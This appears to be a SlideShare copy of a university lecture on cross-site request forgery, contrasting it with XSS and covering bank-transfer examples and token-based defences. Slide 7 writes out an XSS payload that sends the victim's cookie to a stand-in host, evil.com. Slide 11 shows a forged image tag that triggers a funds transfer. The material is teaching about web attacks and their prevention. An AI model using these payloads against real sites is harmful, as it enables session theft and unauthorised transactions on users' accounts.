SlideShare a Scribd company logo

CSRF-Lecture13.pptx

Download as PPTX, PDF
S
ssuserec53e73

Csrf

Education
1 of 20
Cross-site Request Forgery (CSRF) Attacks Vijay Ganesh University of Waterloo Winter 2013
Vijay Ganesh 2 Today’s Lecture Cross-site Request Forgery (CSRF) Attacks  What is a Cross-site Request Forgery (CSRF) attack?  How they differ from XSS attacks  Examples and potential for damage  Measures that do not work  Methods to prevent/protect against such attacks  Server-side to prevent CSRF attacks  Client-side to protect against CSRF attacks
Vijay Ganesh 3 What is CSRF and Why Should you Care?  When a malicious website causes a user’s browser to perform unwanted actions on a trusted website  Called the “sleeping giants of web vulnerabilities” - Zeller & Felten 2008  Sometimes also referred to as XSRF attacks, confused deputy, session riding,..  The percentage of CSRF is 20% of all Web vulnerabilities in 2012*  High profile attacks:  Ebay’s Korea website was attacked in 2008 with 18 million users lost personal information  Mexico bank attack in 2008 caused lost of account information * https://www.whitehatsec.com/resource/stats.html
Vijay Ganesh 4 XSS vs. CSRF  CSRF (Cross-site request forgery)  When a malicious website causes a user’s browser to perform unwanted actions on a trusted website  Examples: Transfer money out of user’s account, harvest user ids, compromise user accounts  XSS (Cross-site scripting)  Malicious website leverages bugs in trusted website to cause unwanted action on user’s browser (circumventing the same-origin policy)  Examples: Reading cookies, authentication information, code injection  Unlike XSS, which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user's browser  Techniques that protect against XSS will not necessarily work for CSRF
Vijay Ganesh 5 High-level View of How CSRF Works Reference: Zeller & Felten 2008
Vijay Ganesh XSRF (aka CSRF): Summary Attack server Server victim User victim 1 2 4 Q: how long do you stay logged on to the Bank? slide 6
slide 7 XSS: Cross-Site Scripting victim’s browser evil.com Access some web page <FRAME SRC= http://naive.com/hello.cgi? name=<script>win.open( “http://evil.com/steal.cgi? cookie=”+document.cookie) </script>> Forces victim’s browser to call hello.cgi on naive.com with this script as “name” GET/ hello.cgi?name= <script>win.open(“http:// evil.com/steal.cgi?cookie”+ document.cookie)</script> hello.cgi executed <HTML>Hello, dear <script>win.open(“http:// evil.com/steal.cgi?cookie=” +document.cookie)</script> Welcome!</HTML> Interpreted as Javascript by victim’s browser; opens window and calls steal.cgi on evil.com GET/ steal.cgi?cookie= Echoes user’s name: <HTML>Hello, dear … </HTML> hello.cgi naive.com
Vijay Ganesh 8 CSRF Attack: Bank Example*  Transfer money from one account to another  When the “Continue” button is pressed, an http POST request is submitted by the user browser to the server (bank) Example courtesy https://www.whitehatsec.com
Vijay Ganesh 9 CSRF Attack: Bank Example*  If the request was successful, $5,000 would be transferred from account “314159265” to account “01123581.”  What’s interesting is that many Web applications, such as transfer_funds.cgi, do not distinguish between parameters sent using GET or POST.  In other words, the same request with POST replaced with GET is completely legit as far as the server is concerned GET Example courtesy https://www.whitehatsec.com
Vijay Ganesh 10 CSRF Attack: Bank Example*  Attacker website has an image with the above tag  The image forces the user’s browser a “forged request” with the specified URL, and if the customer is logged into the bank, money will be transferred from 314159265 to “1618”  The forged request is a GET request with body similar to the POST request Example courtesy https://www.whitehatsec.com
slide 11 CSRF: Bank Example victim’s browser evil.com Access some web page <IMG SRC=http://webbank/transfer_funds. cgi? from=314159265&to=1618&amount =5000&date=11072006&re=0>unt= 5000&date=11072006&re=0> > Forces victim’s browser to call transfer.cgi on webbank.com without proper permissions POST/transfer.cgi?from= 314159265&to=01123581&a mount=5000 transfer.cgi executed GET/transfer.cgi?from= 314159265&to=01123581&a mount=5000 The image-tag from evil.com forces a FORGED GET request to be sent to Bank by victim’s browser. Transfer funds from one account to another transfer.cgi Webbank.com
Vijay Ganesh 12 What can we Learn from the CSRF Bank Attack Example?  CSRF attack: When a malicious website causes a user’s browser to perform unwanted actions on a trusted website  Necessary condition for attack to take place  The user must be capable of executing “unwanted” actions on trusted website, i.e., have implicit authentication  The trusted website only checks that an action came from an authenticated user’s browser, and not the user itself (i.e., no way to check if user authorized the action)  The user must be social-engineered to visit malicious website during the authenticated session with the trusted website  In this particular example, the attacker had to know the “from” account number as well
Vijay Ganesh 13 Can the use of SSL prevent CSRF?  Not necessarily  Goes back to implicit authentication  The user’s browser records session information when she is connected to trusted site the first time  Any subsequent requests sent by the browser are “helpfully” appended with session information  Username, password, or SSL certificates  Hence, SSL does not necessarily protect the user against CSRF  A sure shot way is for the user to authenticate every request. No implicit authentication. Such an approach will make browsers unusable
Vijay Ganesh 14 POST request-based CSRF  In the bank example we saw the CSRF employed a forged GET request  It is possible to execute a CSRF with a POST request  Why care? Some sites only accept POST requests  Executing a POST-based CSRF requires JavaScript  Dynamically creates appropriate POST request
Vijay Ganesh 15 Another Example: GET and POST CSRF • Actual attack discovered by Zeller and Felten on INGDirect.com • Multinational company with $62 Billion in assets and 4.1 million customers • The attack • Allowed an attacker to open additional accounts on behalf of a user and transfer funds from a user’s account to the attacker’s account • The bank site’s use of SSL didn’t prevent the attack • First published CSRF on a financial institution (2008)
Vijay Ganesh 16 Ingdirect.com Attack: GET and POST CSRF • Step 0: • Assume user is already authenticated to ingdirect.com’s site, and visits evil.com controlled by attacker • Assume attacker has JavaScript on his evil.com, and JavaScript engine is enabled on user’s browser. JavaScript is needed to create POST requests • Step 1: The attacker creates checking account on behalf of the user • The attacker causes the user’s browser to visit ING’s “open new account” page using an SRC tag on an image on evil.com • A forged GET request to https://secure.ingdirect.com/myaccount/ INGDirect.html?command= gotoOpenOCA
Vijay Ganesh 17 Ingdirect.com Attack: GET and POST CSRF • Step 2: Causes a “single” account to be created using an appropriate POST command that is generated by JavaScript loaded into user’s browser from evil.com • Step 3: The attacker chooses an arbitrary amount of money to initially transfer from the user’s savings account to the new, fraudulent account • A POST request to https://secure. ingdirect.com/myaccount/ INGDirect.html with the appropriate parameters • Step 4: The attacker causes the user’s browser to click the final “Open Account” button, causing ING to open a new checking account on behalf of the user using an appropriate POST • Step 5: The attacker adds himself as a payee to the user’s account, transfers money
Vijay Ganesh 18 Preventing CSRF Server-side Protection  Allow GET request to only retrieve data and not modify data on the server  Require all POSTs requests to contain a pseudo-random value  Trusted site generates pseudo-random value R, and sets it as a cookie on user’s browser  Every form submission (POST) to include R  Request valid only if form value == cookie value
Vijay Ganesh 19 Preventing CSRF Server-side Protection  Assume that the attacker cannot modify cookie values or read data sent from server to user (same origin policy), i.e., does not know R.  Hence, cannot forge appropriate requests through his evil.com website  We assume R is hash value of session credentials and some random data Sources: Zeller&Felten paper and https://www.whitehatsec.com/resource/stats.html
Vijay Ganesh 20 XSS vs. CSRF  CSRF (Cross-site request forgery)  When a malicious website causes a user’s browser to perform unwanted actions on a trusted website  Leverages implicit authentication in user’s browser  XSS (Cross-site scripting)  Malicious website leverages bugs in trusted website to cause unwanted action on user’s browser (circumventing the same-origin policy)  Leverages bugs on naïve.com  Techniques that protect against XSS: filter content posted on websites for scripts.  Does not directly help protect against CSRF. Why?  If site is vulnerable to XSS, it is vulnerable to CSRF  Why? Session credentials can be stolen using XSS, and then launch a CSRF.

Recommended

Cross site scripting
Cross site scriptingCross site scripting
Cross site scriptingn|u - The Open Security Community
 
JSON based CSRF
JSON based CSRFJSON based CSRF
JSON based CSRFAmit Dubey
 
A8 cross site request forgery (csrf) it 6873 presentation
A8 cross site request forgery (csrf) it 6873 presentationA8 cross site request forgery (csrf) it 6873 presentation
A8 cross site request forgery (csrf) it 6873 presentationAlbena Asenova-Belal
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
Cross Site Request Forgery Vulnerabilities
Cross Site Request Forgery VulnerabilitiesCross Site Request Forgery Vulnerabilities
Cross Site Request Forgery VulnerabilitiesMarco Morana
 
Cross Site Request Forgery (CSRF) Scripting Explained
Cross Site Request Forgery (CSRF) Scripting ExplainedCross Site Request Forgery (CSRF) Scripting Explained
Cross Site Request Forgery (CSRF) Scripting ExplainedValency Networks
 
Introduction to CSRF Attacks & Defense
Introduction to CSRF Attacks & DefenseIntroduction to CSRF Attacks & Defense
Introduction to CSRF Attacks & DefenseSurya Subhash
 
CSRF Basics
CSRF BasicsCSRF Basics
CSRF Basicsn|u - The Open Security Community
 

Recommended

Cross site scripting
Cross site scriptingCross site scripting
Cross site scriptingn|u - The Open Security Community
 
JSON based CSRF
JSON based CSRFJSON based CSRF
JSON based CSRFAmit Dubey
 
A8 cross site request forgery (csrf) it 6873 presentation
A8 cross site request forgery (csrf) it 6873 presentationA8 cross site request forgery (csrf) it 6873 presentation
A8 cross site request forgery (csrf) it 6873 presentationAlbena Asenova-Belal
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
Cross Site Request Forgery Vulnerabilities
Cross Site Request Forgery VulnerabilitiesCross Site Request Forgery Vulnerabilities
Cross Site Request Forgery VulnerabilitiesMarco Morana
 
Cross Site Request Forgery (CSRF) Scripting Explained
Cross Site Request Forgery (CSRF) Scripting ExplainedCross Site Request Forgery (CSRF) Scripting Explained
Cross Site Request Forgery (CSRF) Scripting ExplainedValency Networks
 
Introduction to CSRF Attacks & Defense
Introduction to CSRF Attacks & DefenseIntroduction to CSRF Attacks & Defense
Introduction to CSRF Attacks & DefenseSurya Subhash
 
CSRF Basics
CSRF BasicsCSRF Basics
CSRF Basicsn|u - The Open Security Community
 
Cross Site Scripting
Cross Site ScriptingCross Site Scripting
Cross Site ScriptingAli Mattash
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
Understanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryUnderstanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryDaniel Miessler
 
Xss attack
Xss attackXss attack
Xss attackManjushree Mashal
 
SQL injection
SQL injectionSQL injection
SQL injectionRaj Parmar
 
Advanced Client Side Exploitation Using BeEF
Advanced Client Side Exploitation Using BeEFAdvanced Client Side Exploitation Using BeEF
Advanced Client Side Exploitation Using BeEF1N3
 
Cross site scripting attacks and defenses
Cross site scripting attacks and defensesCross site scripting attacks and defenses
Cross site scripting attacks and defensesMohammed A. Imran
 
Xss (cross site scripting)
Xss (cross site scripting)Xss (cross site scripting)
Xss (cross site scripting)vinayh.vaghamshi _
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionVishal Kumar
 
CSRF Attack and Its Prevention technique in ASP.NET MVC
CSRF Attack and Its Prevention technique in ASP.NET MVCCSRF Attack and Its Prevention technique in ASP.NET MVC
CSRF Attack and Its Prevention technique in ASP.NET MVCSuvash Shah
 
Reflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site ScriptingReflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site ScriptingInMobi Technology
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Amit Tyagi
 
Ssrf
SsrfSsrf
SsrfIlan Mindel
 
Sql injection
Sql injectionSql injection
Sql injectionPallavi Biswas
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and preventionhelloanand
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONAnoop T
 
SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationshipn|u - The Open Security Community
 
Types of sql injection attacks
Types of sql injection attacksTypes of sql injection attacks
Types of sql injection attacksRespa Peter
 
Unit Testing with Jest
Unit Testing with JestUnit Testing with Jest
Unit Testing with JestMaayan Glikser
 
The Security Code Review Guide
The Security Code Review GuideThe Security Code Review Guide
The Security Code Review GuideNicola Pietroluongo
 
A4 A K S H A Y B H A R D W A J
A4 A K S H A Y B H A R D W A JA4 A K S H A Y B H A R D W A J
A4 A K S H A Y B H A R D W A Jbhardwajakshay
 
Hack using firefox
Hack using firefoxHack using firefox
Hack using firefoxReza Nurfachmi
 

More Related Content

What's hot

Cross Site Scripting
Cross Site ScriptingCross Site Scripting
Cross Site ScriptingAli Mattash
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
Understanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryUnderstanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryDaniel Miessler
 
Advanced Client Side Exploitation Using BeEF
Advanced Client Side Exploitation Using BeEFAdvanced Client Side Exploitation Using BeEF
Advanced Client Side Exploitation Using BeEF1N3
 
Cross site scripting attacks and defenses
Cross site scripting attacks and defensesCross site scripting attacks and defenses
Cross site scripting attacks and defensesMohammed A. Imran
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionVishal Kumar
 
CSRF Attack and Its Prevention technique in ASP.NET MVC
CSRF Attack and Its Prevention technique in ASP.NET MVCCSRF Attack and Its Prevention technique in ASP.NET MVC
CSRF Attack and Its Prevention technique in ASP.NET MVCSuvash Shah
 
Reflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site ScriptingReflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site ScriptingInMobi Technology
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Amit Tyagi
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and preventionhelloanand
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONAnoop T
 
Types of sql injection attacks
Types of sql injection attacksTypes of sql injection attacks
Types of sql injection attacksRespa Peter
 
Unit Testing with Jest
Unit Testing with JestUnit Testing with Jest
Unit Testing with JestMaayan Glikser
 

What's hot (20)

Cross Site Scripting
Cross Site ScriptingCross Site Scripting
Cross Site Scripting
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing Techniques
 
Understanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryUnderstanding Cross-site Request Forgery
Understanding Cross-site Request Forgery
 
Xss attack
Xss attackXss attack
Xss attack
 
SQL injection
SQL injectionSQL injection
SQL injection
 
Advanced Client Side Exploitation Using BeEF
Advanced Client Side Exploitation Using BeEFAdvanced Client Side Exploitation Using BeEF
Advanced Client Side Exploitation Using BeEF
 
Cross site scripting attacks and defenses
Cross site scripting attacks and defensesCross site scripting attacks and defenses
Cross site scripting attacks and defenses
 
Xss (cross site scripting)
Xss (cross site scripting)Xss (cross site scripting)
Xss (cross site scripting)
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL Injection
 
CSRF Attack and Its Prevention technique in ASP.NET MVC
CSRF Attack and Its Prevention technique in ASP.NET MVCCSRF Attack and Its Prevention technique in ASP.NET MVC
CSRF Attack and Its Prevention technique in ASP.NET MVC
 
Reflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site ScriptingReflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site Scripting
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)
 
Ssrf
SsrfSsrf
Ssrf
 
Sql injection
Sql injectionSql injection
Sql injection
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and prevention
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
 
SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationship
 
Types of sql injection attacks
Types of sql injection attacksTypes of sql injection attacks
Types of sql injection attacks
 
Unit Testing with Jest
Unit Testing with JestUnit Testing with Jest
Unit Testing with Jest
 
The Security Code Review Guide
The Security Code Review GuideThe Security Code Review Guide
The Security Code Review Guide
 

Similar to CSRF-Lecture13.pptx

A4 A K S H A Y B H A R D W A J
A4 A K S H A Y B H A R D W A JA4 A K S H A Y B H A R D W A J
A4 A K S H A Y B H A R D W A Jbhardwajakshay
 
CSRF_RSA_2008_Jeremiah_Grossman
CSRF_RSA_2008_Jeremiah_GrossmanCSRF_RSA_2008_Jeremiah_Grossman
CSRF_RSA_2008_Jeremiah_Grossmanguestdb261a
 
Prevention Against CSRF Attack using Client Server Mutual Authentication Tech...
Prevention Against CSRF Attack using Client Server Mutual Authentication Tech...Prevention Against CSRF Attack using Client Server Mutual Authentication Tech...
Prevention Against CSRF Attack using Client Server Mutual Authentication Tech...IRJET Journal
 
Cm7 secure code_training_1day_xss
Cm7 secure code_training_1day_xssCm7 secure code_training_1day_xss
Cm7 secure code_training_1day_xssdcervigni
 
Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter
Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter
Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter Nilesh Sapariya
 
Tales of modern day data breaches - a web security guide for developers
Tales of modern day data breaches - a web security guide for developersTales of modern day data breaches - a web security guide for developers
Tales of modern day data breaches - a web security guide for developersJaap Karan Singh
 
Web application security
Web application securityWeb application security
Web application securityJin Castor
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application SecurityChris Hillman
 
Owasp top 10 vulnerabilities 2013
Owasp top 10 vulnerabilities 2013Owasp top 10 vulnerabilities 2013
Owasp top 10 vulnerabilities 2013Vishrut Sharma
 
CSRF Web Vulnerabilities – Nikita Makeyev
CSRF Web Vulnerabilities – Nikita MakeyevCSRF Web Vulnerabilities – Nikita Makeyev
CSRF Web Vulnerabilities – Nikita MakeyevLuna Web
 
PENETRATION TEST ( CLIENT-SIDE ) CSRF / CORS MISCONFIGURATION
PENETRATION TEST ( CLIENT-SIDE ) CSRF / CORS MISCONFIGURATIONPENETRATION TEST ( CLIENT-SIDE ) CSRF / CORS MISCONFIGURATION
PENETRATION TEST ( CLIENT-SIDE ) CSRF / CORS MISCONFIGURATIONTadj Youssouf
 

Similar to CSRF-Lecture13.pptx (20)

A4 A K S H A Y B H A R D W A J
A4 A K S H A Y B H A R D W A JA4 A K S H A Y B H A R D W A J
A4 A K S H A Y B H A R D W A J
 
Hack using firefox
Hack using firefoxHack using firefox
Hack using firefox
 
Csrf
CsrfCsrf
Csrf
 
CSRF_RSA_2008_Jeremiah_Grossman
CSRF_RSA_2008_Jeremiah_GrossmanCSRF_RSA_2008_Jeremiah_Grossman
CSRF_RSA_2008_Jeremiah_Grossman
 
CSRF_main_vid.pptx
CSRF_main_vid.pptxCSRF_main_vid.pptx
CSRF_main_vid.pptx
 
Prevention Against CSRF Attack using Client Server Mutual Authentication Tech...
Prevention Against CSRF Attack using Client Server Mutual Authentication Tech...Prevention Against CSRF Attack using Client Server Mutual Authentication Tech...
Prevention Against CSRF Attack using Client Server Mutual Authentication Tech...
 
Cm7 secure code_training_1day_xss
Cm7 secure code_training_1day_xssCm7 secure code_training_1day_xss
Cm7 secure code_training_1day_xss
 
Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter
Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter
Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter
 
Tales of modern day data breaches - a web security guide for developers
Tales of modern day data breaches - a web security guide for developersTales of modern day data breaches - a web security guide for developers
Tales of modern day data breaches - a web security guide for developers
 
Example my ppt
Example my pptExample my ppt
Example my ppt
 
Web spoofing (1)
Web spoofing (1)Web spoofing (1)
Web spoofing (1)
 
Web application security
Web application securityWeb application security
Web application security
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
 
MVC CSRF Protection
MVC CSRF ProtectionMVC CSRF Protection
MVC CSRF Protection
 
Owasp top 10 vulnerabilities 2013
Owasp top 10 vulnerabilities 2013Owasp top 10 vulnerabilities 2013
Owasp top 10 vulnerabilities 2013
 
CSRF Web Vulnerabilities – Nikita Makeyev
CSRF Web Vulnerabilities – Nikita MakeyevCSRF Web Vulnerabilities – Nikita Makeyev
CSRF Web Vulnerabilities – Nikita Makeyev
 
Security 101
Security 101Security 101
Security 101
 
PENETRATION TEST ( CLIENT-SIDE ) CSRF / CORS MISCONFIGURATION
PENETRATION TEST ( CLIENT-SIDE ) CSRF / CORS MISCONFIGURATIONPENETRATION TEST ( CLIENT-SIDE ) CSRF / CORS MISCONFIGURATION
PENETRATION TEST ( CLIENT-SIDE ) CSRF / CORS MISCONFIGURATION
 
Amazon & E Bay
Amazon & E BayAmazon & E Bay
Amazon & E Bay
 
Vulnerabilities in Web Applications
Vulnerabilities in Web ApplicationsVulnerabilities in Web Applications
Vulnerabilities in Web Applications
 

More from ssuserec53e73

Threats in network that can be noted in security
Threats in network that can be noted in securityThreats in network that can be noted in security
Threats in network that can be noted in securityssuserec53e73
 
Lsn21_NumPy in data science using python
Lsn21_NumPy in data science using pythonLsn21_NumPy in data science using python
Lsn21_NumPy in data science using pythonssuserec53e73
 
OpenSecure socket layerin cyber security
OpenSecure socket layerin cyber securityOpenSecure socket layerin cyber security
OpenSecure socket layerin cyber securityssuserec53e73
 
Hash functions, digital signatures and hmac
Hash functions, digital signatures and hmacHash functions, digital signatures and hmac
Hash functions, digital signatures and hmacssuserec53e73
 
Asian Elephant Adaptations - Chelsea P..pptx
Asian Elephant Adaptations - Chelsea P..pptxAsian Elephant Adaptations - Chelsea P..pptx
Asian Elephant Adaptations - Chelsea P..pptxssuserec53e73
 
Module 10-Introduction to OOP.pptx
Module 10-Introduction to OOP.pptxModule 10-Introduction to OOP.pptx
Module 10-Introduction to OOP.pptxssuserec53e73
 
50134147-Knowledge-Representation-Using-Rules.ppt
50134147-Knowledge-Representation-Using-Rules.ppt50134147-Knowledge-Representation-Using-Rules.ppt
50134147-Knowledge-Representation-Using-Rules.pptssuserec53e73
 
IoT Reference Architecture.pptx
IoT Reference Architecture.pptxIoT Reference Architecture.pptx
IoT Reference Architecture.pptxssuserec53e73
 
Introduction to measurement.pptx
Introduction to measurement.pptxIntroduction to measurement.pptx
Introduction to measurement.pptxssuserec53e73
 
ML-DecisionTrees.ppt
ML-DecisionTrees.pptML-DecisionTrees.ppt
ML-DecisionTrees.pptssuserec53e73
 

More from ssuserec53e73 (20)

Threats in network that can be noted in security
Threats in network that can be noted in securityThreats in network that can be noted in security
Threats in network that can be noted in security
 
Lsn21_NumPy in data science using python
Lsn21_NumPy in data science using pythonLsn21_NumPy in data science using python
Lsn21_NumPy in data science using python
 
OpenSecure socket layerin cyber security
OpenSecure socket layerin cyber securityOpenSecure socket layerin cyber security
OpenSecure socket layerin cyber security
 
Hash functions, digital signatures and hmac
Hash functions, digital signatures and hmacHash functions, digital signatures and hmac
Hash functions, digital signatures and hmac
 
Asian Elephant Adaptations - Chelsea P..pptx
Asian Elephant Adaptations - Chelsea P..pptxAsian Elephant Adaptations - Chelsea P..pptx
Asian Elephant Adaptations - Chelsea P..pptx
 
Module 10-Introduction to OOP.pptx
Module 10-Introduction to OOP.pptxModule 10-Introduction to OOP.pptx
Module 10-Introduction to OOP.pptx
 
unit-1-l3.ppt
unit-1-l3.pptunit-1-l3.ppt
unit-1-l3.ppt
 
AI.ppt
AI.pptAI.ppt
AI.ppt
 
50134147-Knowledge-Representation-Using-Rules.ppt
50134147-Knowledge-Representation-Using-Rules.ppt50134147-Knowledge-Representation-Using-Rules.ppt
50134147-Knowledge-Representation-Using-Rules.ppt
 
Dr Jose Reena K.pdf
Dr Jose Reena K.pdfDr Jose Reena K.pdf
Dr Jose Reena K.pdf
 
Enumeration.pptx
Enumeration.pptxEnumeration.pptx
Enumeration.pptx
 
footscan.PPT
footscan.PPTfootscan.PPT
footscan.PPT
 
UNIT II.pptx
UNIT II.pptxUNIT II.pptx
UNIT II.pptx
 
Unit 1 iot.pptx
Unit 1 iot.pptxUnit 1 iot.pptx
Unit 1 iot.pptx
 
IoT Reference Architecture.pptx
IoT Reference Architecture.pptxIoT Reference Architecture.pptx
IoT Reference Architecture.pptx
 
patent ppt.pptx
patent ppt.pptxpatent ppt.pptx
patent ppt.pptx
 
Introduction to measurement.pptx
Introduction to measurement.pptxIntroduction to measurement.pptx
Introduction to measurement.pptx
 
ML-DecisionTrees.ppt
ML-DecisionTrees.pptML-DecisionTrees.ppt
ML-DecisionTrees.ppt
 
ML_Lecture_7.ppt
ML_Lecture_7.pptML_Lecture_7.ppt
ML_Lecture_7.ppt
 
070308-simmons.ppt
070308-simmons.ppt070308-simmons.ppt
070308-simmons.ppt
 

Recently uploaded

Beyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global ImpactBeyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global ImpactPECB
 
Arihant handbook biology for class 11 .pdf
Arihant handbook biology for class 11 .pdfArihant handbook biology for class 11 .pdf
Arihant handbook biology for class 11 .pdfchloefrazer622
 
Software Engineering Methodologies (overview)
Software Engineering Methodologies (overview)Software Engineering Methodologies (overview)
Software Engineering Methodologies (overview)eniolaolutunde
 
Z Score,T Score, Percential Rank and Box Plot Graph
Z Score,T Score, Percential Rank and Box Plot GraphZ Score,T Score, Percential Rank and Box Plot Graph
Z Score,T Score, Percential Rank and Box Plot GraphThiyagu K
 
BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...
BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...
BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...Sapna Thakur
 
Presentation by Andreas Schleicher Tackling the School Absenteeism Crisis 30 ...
Presentation by Andreas Schleicher Tackling the School Absenteeism Crisis 30 ...Presentation by Andreas Schleicher Tackling the School Absenteeism Crisis 30 ...
Presentation by Andreas Schleicher Tackling the School Absenteeism Crisis 30 ...EduSkills OECD
 
Activity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdfActivity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdfciinovamais
 
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Krashi Coaching
 
The Most Excellent Way | 1 Corinthians 13
The Most Excellent Way | 1 Corinthians 13The Most Excellent Way | 1 Corinthians 13
The Most Excellent Way | 1 Corinthians 13Steve Thomason
 
microwave assisted reaction. General introduction
microwave assisted reaction. General introductionmicrowave assisted reaction. General introduction
microwave assisted reaction. General introductionMaksud Ahmed
 
fourth grading exam for kindergarten in writing
fourth grading exam for kindergarten in writingfourth grading exam for kindergarten in writing
fourth grading exam for kindergarten in writingTeacherCyreneCayanan
 
Call Girls in Dwarka Mor Delhi Contact Us 9654467111
Call Girls in Dwarka Mor Delhi Contact Us 9654467111Call Girls in Dwarka Mor Delhi Contact Us 9654467111
Call Girls in Dwarka Mor Delhi Contact Us 9654467111Sapana Sha
 
Disha NEET Physics Guide for classes 11 and 12.pdf
Disha NEET Physics Guide for classes 11 and 12.pdfDisha NEET Physics Guide for classes 11 and 12.pdf
Disha NEET Physics Guide for classes 11 and 12.pdfchloefrazer622
 
1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdf1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdfQucHHunhnh
 
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...fonyou31
 
Class 11th Physics NEET formula sheet pdf
Class 11th Physics NEET formula sheet pdfClass 11th Physics NEET formula sheet pdf
Class 11th Physics NEET formula sheet pdfAyushMahapatra5
 
Unit-IV- Pharma. Marketing Channels.pptx
Unit-IV- Pharma. Marketing Channels.pptxUnit-IV- Pharma. Marketing Channels.pptx
Unit-IV- Pharma. Marketing Channels.pptxVishalSingh1417
 
1029 - Danh muc Sach Giao Khoa 10 . pdf
1029 - Danh muc Sach Giao Khoa 10 . pdf1029 - Danh muc Sach Giao Khoa 10 . pdf
1029 - Danh muc Sach Giao Khoa 10 . pdfQucHHunhnh
 
Interactive Powerpoint_How to Master effective communication
Interactive Powerpoint_How to Master effective communicationInteractive Powerpoint_How to Master effective communication
Interactive Powerpoint_How to Master effective communicationnomboosow
 

Recently uploaded (20)

Beyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global ImpactBeyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global Impact
 
Arihant handbook biology for class 11 .pdf
Arihant handbook biology for class 11 .pdfArihant handbook biology for class 11 .pdf
Arihant handbook biology for class 11 .pdf
 
